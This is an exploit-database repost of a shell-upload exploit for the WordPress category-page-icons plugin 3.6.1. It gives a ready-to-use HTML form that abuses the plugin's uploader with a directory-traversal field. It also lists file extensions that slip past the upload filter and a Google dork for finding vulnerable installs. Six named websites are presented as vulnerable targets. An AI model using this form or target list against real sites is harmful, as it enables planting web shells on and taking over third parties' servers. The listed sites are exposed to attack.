Advertisement






WordPress category-page-icons Plugins 3.6.1 CSRF Backdoor Access Vulnerability

CVE Category Price Severity
CVE-2020-24809 CWE-264 Not specified High
Author Risk Exploitation Type Date
JaMb0 High Remote 2019-01-18
CPE
cpe:cpe:/a:wordpress:category_page_icons_plugins:3.6.1
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019010182

Below is a copy:

WordPress category-page-icons Plugins 3.6.1 CSRF Backdoor Access Vulnerability
####################################################################

# Exploit Title : WordPress category-page-icons Plugins 3.6.1 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/01/2019
# Vendor Homepage : wordpress.org
wp-premiumplugins.com/category-page-icons/
wordpress.org/plugins/category-page-icons/
# Software Download Link : 
github.com/wp-plugins/category-page-icons/archive/master.zip
# Software Vulnerable Code => [ wpdev-flash-uploader.php ]
plugins.svn.wordpress.org/category-page-icons/trunk/include/wpdev-flash-uploader.php
github.com/wp-plugins/category-page-icons/blob/master/include/wpdev-flash-uploader.php
# Version Information : Current Version 3.6.1 => 
+ Requires at least: 2.7 - Tested up to: 3.6.1 - Stable tag: 0.9.2
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/category-page-icons/''
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-98 [ Improper Control of Filename for 
Include/Require Statement in PHP Program ('PHP File Inclusion') ]
# PacketStormSecurity Exploit Reference Link :
packetstormsecurity.com/files/151193/WordPress-Category-Page-Icons-3.6.1-CSRF-Shell-Upload.html

####################################################################

WordPress category-page-icons Plugins 3.6.1 CSRF Backdoor Access Vulnerability

####################################################################

# Arbitrary File Upload/Shell Upload CSRF Exploit :
*********************************************

<form enctype="multipart/form-data"
action="https://VULNERABLESITEHERE/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php" method="post">
Your File: <input name="wpdev-async-upload" type="file" /><br />
<input type="hidden" name="dir_icons" value="../../../../">
<input type="submit" value="upload" />
</form>

####################################################################

# Directory File Path :
*********************

SITE/[yourfilename.php.pjpg]
SITE/wp-content/[yourfilename.php.pjpg]

# Allowed File Extensions : txt - jpg - gif - png - 

html.jpg -  php.pjpg - asp;.gif  - php;.gif - phtml

####################################################################

# Example Vulnerable Sites :
*************************

[+] dtacmail.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

[+] dutary.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

[+] ddns2u.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

[+] inuse.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

[+] ceobible.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

[+] guruok.com/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum